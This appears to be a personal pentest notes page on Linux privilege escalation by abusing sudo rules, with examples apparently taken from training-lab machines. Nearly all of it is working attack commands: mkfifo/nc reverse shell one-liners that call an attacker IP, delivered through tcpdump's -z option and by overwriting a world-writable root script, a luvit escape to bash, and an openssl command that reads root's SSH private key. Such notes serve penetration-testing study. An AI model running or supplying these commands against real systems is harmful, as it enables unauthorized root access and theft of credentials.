# Sudo Rights Abuse

## ALL : ALL

```shell-session
sudo -l
[sudo] password for user1:
...SNIP...

User user1 may run the following commands on ExampleServer:
    (ALL : ALL) ALL

sudo su -

[sudo] password for user1:
whoami
root
```

## (ALL, !root)

{% content-ref url="services-and-internals-enum" %}
[services-and-internals-enum](https://0xss0rz.gitbook.io/0xss0rz/pentest/privilege-escalation/linux/services-and-internals-enum)
{% endcontent-ref %}

## NOPASSWD

### Example 1 - USER

```shell-session
sudo -l

    (user : user) NOPASSWD: /bin/echo

sudo -u user /bin/echo Hello World!

    Hello World!
```

```

User webadmin may run the following commands on traceback:
    (sysadmin) NOPASSWD: /home/webadmin/luvit
$ 

#Exploitation
webadmin@traceback:/etc/update-motd.d$ sudo -u sysadmin /home/sysadmin/luvit -e 'os.execute("/bin/bash")'
<n /home/sysadmin/luvit -e 'os.execute("/bin/bash")'
sysadmin@traceback:/etc/update-motd.d$
```

### Example 2 - USER2 - Lateral Movement

<figure><img src="https://4199783661-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFF3hT6DtJlHn9jAel9%2Fuploads%2FJrQSRaac2cMI6uzOVRvJ%2Fimage.png?alt=media&#x26;token=7f7d5df5-f77d-4363-88f1-874eb2254344" alt=""><figcaption></figcaption></figure>

### Example 3 - ROOT -  tcpdump

```shell-session
sudo -l

Matching Defaults entries for sysadm on NIX02:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User sysadm may run the following commands on NIX02:
    (root) NOPASSWD: /usr/sbin/tcpdump
```

* <https://gtfobins.github.io/gtfobins/tcpdump/>

```shell-session
cat /tmp/.test

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.3 443 >/tmp/f
```

```shell-session
sudo /usr/sbin/tcpdump -ln -i ens192 -w /dev/null -W 1 -G 1 -z /tmp/.test -Z root

dropped privs to root
tcpdump: listening on ens192, link-type EN10MB (Ethernet), capture size 262144 bytes
Maximum file limit reached: 1
1 packet captured
6 packets received by filter
compress_savefile: execlp(/tmp/.test, /dev/null) failed: Permission denied
0 packets dropped by kernel
```

```shell-session
nc -lnvp 443

listening on [any] 443 ...
connect to [10.10.14.3] from (UNKNOWN) [10.129.2.12] 38938
bash: cannot set terminal process group (10797): Inappropriate ioctl for device
bash: no job control in this shell

root@NIX02:~# id && hostname               
id && hostname
uid=0(root) gid=0(root) groups=0(root)
NIX02
```

### Example 4 - Python

```shell-session
htb-student@lpenix:~$ sudo -l 

Matching Defaults entries for htb-student on ACADEMY-LPENIX:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User htb-student may run the following commands on ACADEMY-LPENIX:
    (ALL : ALL) SETENV: NOPASSWD: /usr/bin/python3
```

See **Privilege Escalation using PYTHONPATH Environment Variable**

{% content-ref url="python-library-hijacking" %}
[python-library-hijacking](https://0xss0rz.gitbook.io/0xss0rz/pentest/privilege-escalation/linux/python-library-hijacking)
{% endcontent-ref %}

### Example 5 - script - write permission

```
$ sudo -l
Matching Defaults entries for nibbler on Nibbles:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User nibbler may run the following commands on Nibbles:
    (root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh

nibbler@Nibbles:/home/nibbler/personal/stuff$ ls -la
ls -la
total 12
drwxr-xr-x 2 nibbler nibbler 4096 Dec 10  2017 .
drwxr-xr-x 3 nibbler nibbler 4096 Dec 10  2017 ..
-rwxrwxrwx 1 nibbler nibbler 4015 May  8  2015 monitor.sh
```

Change script content:

```
nibbler@Nibbles:/home/nibbler/personal/stuff$ echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 2>&1| nc 10.10.16.110 4444 >/tmp/f" > monitor.sh
< /tmp/f | /bin/sh -i 2>&1| nc 10.10.16.110 4444 >/tmp/f" > monitor.sh       
nibbler@Nibbles:/home/nibbler/personal/stuff$ sudo /home/nibbler/personal/stuff/monitor.sh
<er/personal/stuff$ sudo /home/nibbler/personal/stuff/monitor.sh
```

### Example 6 - LD\_PRELOADES

```shell-session
htb_student@NIX02:~$ sudo -l

Matching Defaults entries for daniel.carter on NIX02:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, env_keep+=LD_PRELOAD

User daniel.carter may run the following commands on NIX02:
    (root) NOPASSWD: /usr/sbin/apache2 restart
```

This user has rights to restart the Apache service as root, but since this is `NOT` a [GTFOBin](https://gtfobins.github.io/#apache) and the `/etc/sudoers` entry is written specifying the absolute path, this could not be used to escalate privileges under normal circumstances

Could be absue with **LD\_PRELOADES**

{% content-ref url="shared-libraries" %}
[shared-libraries](https://0xss0rz.gitbook.io/0xss0rz/pentest/privilege-escalation/linux/shared-libraries)
{% endcontent-ref %}

### Example 7 - Openssl

```shell-session
$ sudo -l

Matching Defaults entries for srvadm on dmz01:
  env_reset, mail_badpass,
  secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User srvadm may run the following commands on dmz01:
  (ALL) NOPASSWD: /usr/bin/openssl
```

```shell-session
$ LFILE=/root/.ssh/id_rsa
$ sudo /usr/bin/openssl enc -in $LFILE
```